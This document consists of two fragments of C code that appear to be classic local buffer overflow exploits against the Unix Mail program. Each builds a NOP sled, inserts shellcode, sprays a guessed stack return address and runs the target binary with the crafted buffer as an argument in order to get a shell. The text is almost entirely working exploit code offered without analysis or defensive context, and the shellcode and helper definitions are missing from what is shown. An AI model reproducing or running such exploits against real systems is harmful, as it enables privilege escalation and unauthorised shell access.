int main(int argc, char * argv[]) { int i, offset = 0; long address; if(argc > 1) offset = atoi(argv[1]); address = getesp() -11000 + offset; memset(buf,NOP,BUFFER); memcpy(buf+800,code,strlen(code)); for(i=876;i<BUFFER-2;i+=4) *(int *)&buf[i]=address; fprintf (stderr, "Hit '.' to get shell..\n"); execl(PATH, PATH, "x","-s","x","-c", buf,0); }
int main(int argc, char **argv) { int x; long addr = getesp() - 18000; memset(buffer, 0x90, 10000); memcpy(buffer + 800, shellcode, strlen(shellcode)); for(x = 876; x < 9998; x += 4) *(int *)&buffer[x] = addr; fprintf(stderr, "type '.' and enter: "); execl("/usr/bin/Mail", "/usr/bin/Mail", "nobody", "-s", "blah", "-c", buffer, 0); }